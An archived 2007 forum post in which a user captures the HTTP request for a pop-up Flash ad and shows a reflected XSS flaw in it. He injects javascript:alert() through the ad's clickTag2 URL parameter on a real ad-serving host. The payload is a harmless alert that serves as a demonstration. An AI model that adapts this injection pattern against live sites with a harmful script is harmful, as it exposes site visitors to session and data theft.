Thread: Pop-ups?
View Single Post
Old 08-21-07, 04:56 PM   #31
evilghost
Registered User
 
Join Date: Jul 2005
Posts: 3,606
Default Re: Pop-ups?

Here's over the wire, as you can see, I was right about the cookie.

Code:
GET /static/sc_trans2_black_li-350x250-1l-eng-nul.swf?clickTag=javascript:DL_GotoSurvey();&clickTag2=javascript:DL_Close(); HTTP/1.1

Accept: */*
Referer: http://www.nvnews.net/vbulletin/
x-flash-version: 9,0,16,0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: amch.questionmarket.com
Connection: Keep-Alive
Cookie: linkjumptest=1
Here's the direct link to the annoying worthless flash that flies across your screen:

Code:
http://amch.questionmarket.com/static/sc_trans2_black_li-350x250-1l-eng-nul.swf?clickTag=javascript:DL_GotoSurvey();&clickTag2=javascript:DL_Close();
And here's me owning that same link with a blatant XSS vulnerability:

Code:
http://amch.questionmarket.com/static/sc_trans2_black_li-350x250-1l-eng-nul.swf?clickTag=javascript:DL_GotoSurvey();&clickTag2=javascript:alert('evilghost is your daddy');
Go ahead, open it, and click the 'Close' button

MikeC, if you want to engage intellitxt, this post is what you need. It's the direct URL to the flash they are serving up.
evilghost is offline   Reply With Quote